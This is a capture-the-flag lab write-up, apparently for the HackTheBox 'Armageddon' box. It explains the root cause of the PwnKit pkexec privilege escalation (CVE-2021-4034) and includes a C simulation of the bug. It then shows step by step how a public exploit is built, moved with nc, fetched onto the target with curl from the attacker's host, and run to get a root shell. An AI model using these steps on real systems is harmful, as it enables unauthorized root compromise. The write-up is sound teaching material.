CVE-2021-4034


PEAS reported that the target system is vulnerable to CVE-2021-4034 (PwnKit).

The vulnerable program, pkexec, is part of Polkit, the framework that decides whether an unprivileged process may perform a privileged action. pkexec is a setuid-root binary that runs a command as another user (root by default) once Polkit authorizes it, much like sudo.

The flaw is an out-of-bounds read and write that occurs when pkexec is executed with an empty argument list (argc == 0, which execve() permits). Its argument parser then reads argv[1], which is really envp[0], treats it as the program name, resolves it through PATH and writes the result back into the same slot, so an attacker-chosen variable such as GCONV_PATH ends up inside pkexec's own environment. Pointing GCONV_PATH at a crafted charset-conversion module makes pkexec load and execute attacker code as root. The fix (upstream polkit 0.120, January 2022) was backported by distributions, so check the distribution package version rather than the upstream version string.
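Added example (my own illustration, not code from this page or from berdav's repository): it models the two pkexec lines that turn an empty argv into an environment-variable injection, using the same directory and file names the exploit's Makefile creates below. `find_program_in_path()` is a simplified stand-in for GLib's `g_find_program_in_path()`, `simulate_pkexec()` condenses pkexec's `main()`, and `simulate_pkexec_fixed()` mirrors the shape of the upstream fix (exit when `argc < 1`); the scratch directory name is this example's own.

```c
/* Added illustration of CVE-2021-4034's root cause (not pkexec's or
 * berdav's code). find_program_in_path() stands in for GLib's
 * g_find_program_in_path(); simulate_pkexec*() condense pkexec's main(). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

static char *xstrdup(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p) memcpy(p, s, n);
    return p;
}

/* For each ':'-separated entry of `path`, return a malloc'd "entry/name"
 * if that is an executable regular file. The PATH entry is kept verbatim. */
static char *find_program_in_path(const char *name, const char *path)
{
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t dlen = end ? (size_t)(end - p) : strlen(p);
        char *cand = malloc(dlen + strlen(name) + 2);
        struct stat st;
        if (!cand) return NULL;
        memcpy(cand, p, dlen);
        cand[dlen] = '/';
        strcpy(cand + dlen + 1, name);
        if (stat(cand, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & S_IXUSR))
            return cand;
        free(cand);
        if (!end) return NULL;
        p = end + 1;
    }
}

/* Vulnerable shape of pkexec's main(): the option loop starts at n = 1 and
 * never runs when argc == 0, so path = argv[1], which is really envp[0].
 * A relative path is resolved via PATH and written back over envp[0]. */
static const char *simulate_pkexec(int argc, char **argv, const char *path_env)
{
    int n;
    const char *path;
    for (n = 1; n < argc; n++) { /* --user, --disable-internal-agent, ... */ }
    path = argv[n];                       /* out-of-bounds read when argc == 0 */
    if (path == NULL) return NULL;
    if (path[0] != '/') {
        char *found = find_program_in_path(path, path_env);
        if (found == NULL) return NULL;
        argv[n] = found;                  /* out-of-bounds write into envp[0] */
    }
    return argv[n];
}

/* Shape of the upstream fix: refuse an empty argv before touching argv[1]. */
static const char *simulate_pkexec_fixed(int argc, char **argv, const char *path_env)
{
    if (argc < 1) return NULL;            /* real pkexec exits with 127 here */
    return simulate_pkexec(argc, argv, path_env);
}

/* Lay out argv and envp as execve(2) does for argv = {NULL},
 * envp = {"pwnkit.so:.", NULL}: one pointer array, envp starting right
 * after argv's terminator. Recreate the Makefile's trick (directory
 * "GCONV_PATH=." holding an executable "pwnkit.so:.") in a scratch dir,
 * run the simulated pkexec with PATH=GCONV_PATH=., and return a copy of
 * envp[0] afterwards (NULL on setup failure). */
char *envp0_after_pkexec(int fixed)
{
    const char *literal = "pwnkit.so:.";
    char *stack[3], **argv = stack, **envp = stack + 1;
    char scratch[64], cwd[4096], *result = NULL;
    int fd;

    if (!getcwd(cwd, sizeof cwd)) return NULL;
    snprintf(scratch, sizeof scratch, "/tmp/pwnkit-demo-%ld", (long)getpid());
    if (mkdir(scratch, 0700) != 0) {      /* fall back to the current directory */
        snprintf(scratch, sizeof scratch, "pwnkit-demo-%ld", (long)getpid());
        if (mkdir(scratch, 0700) != 0) return NULL;
    }
    if (chdir(scratch) != 0) return NULL;
    mkdir("GCONV_PATH=.", 0755);
    fd = open("GCONV_PATH=./pwnkit.so:.", O_WRONLY | O_CREAT, 0755);
    if (fd >= 0) close(fd);

    stack[0] = NULL;                      /* argc == 0: argv is only its terminator */
    stack[1] = (char *)literal;           /* envp[0] */
    stack[2] = NULL;                      /* envp terminator */

    if (fixed) simulate_pkexec_fixed(0, argv, "GCONV_PATH=.");
    else       simulate_pkexec(0, argv, "GCONV_PATH=.");

    if (envp[0]) result = xstrdup(envp[0]);
    if (stack[1] != literal) free(stack[1]);
    unlink("GCONV_PATH=./pwnkit.so:.");
    rmdir("GCONV_PATH=.");
    if (chdir(cwd) == 0) rmdir(scratch);
    return result;
}

/* 1 if envp[0] ends up equal to `expect`, else 0. */
int envp0_becomes(int fixed, const char *expect)
{
    char *got = envp0_after_pkexec(fixed);
    int ok = got != NULL && strcmp(got, expect) == 0;
    free(got);
    return ok;
}

int main(void)
{
    char *v = envp0_after_pkexec(0), *f = envp0_after_pkexec(1);
    printf("vulnerable: envp[0] = %s\nfixed:      envp[0] = %s\n", v ? v : "(null)", f ? f : "(null)");
    free(v); free(f);
    return 0;
}
```

With the vulnerable logic, envp[0] becomes `GCONV_PATH=./pwnkit.so:.`; with the fix it stays `pwnkit.so:.`. Because environ points at the same array, glibc's getenv("GCONV_PATH") later honours the injected entry (the dynamic loader only strips such variables from a setuid process at startup, not after pkexec rewrites them), and the error message pkexec prints on the way out triggers iconv, which loads the attacker's gconv module as root.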

exploit (pwnkit):


I found an exploit online

[brucetherealadmin@armageddon ~]$ gcc
-bash: gcc: command not found
[brucetherealadmin@armageddon ~]$ cc
-bash: cc: command not found

No compiler is available on the target, so the exploit has to be built elsewhere and copied over. Building it in a CentOS 7 container keeps the glibc version matched to the target (the root shell obtained later is bash 4.2, i.e. CentOS/RHEL 7), which avoids the GLIBC_2.xx symbol-version errors a binary built on a newer Kali host would hit.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ docker run -it --entrypoint "/bin/bash" --name armageddon centos:7
Unable to find image 'centos:7' locally
7: Pulling from library/centos
2d473b07cdd5: Pull complete 
Digest: sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4
Status: Downloaded newer image for centos:7
[root@b81e04df58c7 /]# yum update ; yum install -y net-tools netcat nano gcc gcc-multilib make git wget

Setting up the environment

[root@b81e04df58c7 ~]# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.

Cloning the exploit repository

[root@b81e04df58c7 CVE-2021-4034]# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
make: which: Command not found
mkdir -p GCONV_PATH=.
cp -f  GCONV_PATH=./pwnkit.so:.
cp: missing destination file operand after 'GCONV_PATH=./pwnkit.so:.'
Try 'cp --help' for more information.
make: *** [gconvpath] Error 1

The build fails because the Makefile uses `which` to locate `true` (the file it copies into the GCONV_PATH=. directory), and `which` is not installed in the container, so the cp command ends up with a single operand.

[root@b81e04df58c7 ~]# yum install which -y

Let’s install which

[root@b81e04df58c7 CVE-2021-4034]# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

The build completes this time

[root@b81e04df58c7 CVE-2021-4034]# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034 

Packaging it up for delivery

[root@b81e04df58c7 ~]# nc 172.18.0.1 2222 < CVE-2021-4034.tar.gz 
┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
listening on [any] 2222 ...
connect to [172.18.0.1] from (UNKNOWN) [172.17.0.2] 51522

I moved the package out of the Docker container to the host where a web server is running for delivery to the target system

Exploitation


[brucetherealadmin@armageddon ~]$ curl -s http://10.10.14.2/CVE-2021-4034.tar.gz -o CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

[brucetherealadmin@armageddon CVE-2021-4034]$ ./cve-2021-4034
sh-4.2# whoami
root
sh-4.2# hostname
armageddon.htb
sh-4.2# ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.233  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::7648:5ea1:5371:b3b5  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::69d1:bb00:780c:f997  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:77:2d  txqueuelen 1000  (Ethernet)
        RX packets 844154  bytes 153226019 (146.1 MiB)
        RX errors 0  dropped 148  overruns 0  frame 0
        TX packets 830041  bytes 303615645 (289.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1448  bytes 146156 (142.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1448  bytes 146156 (142.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise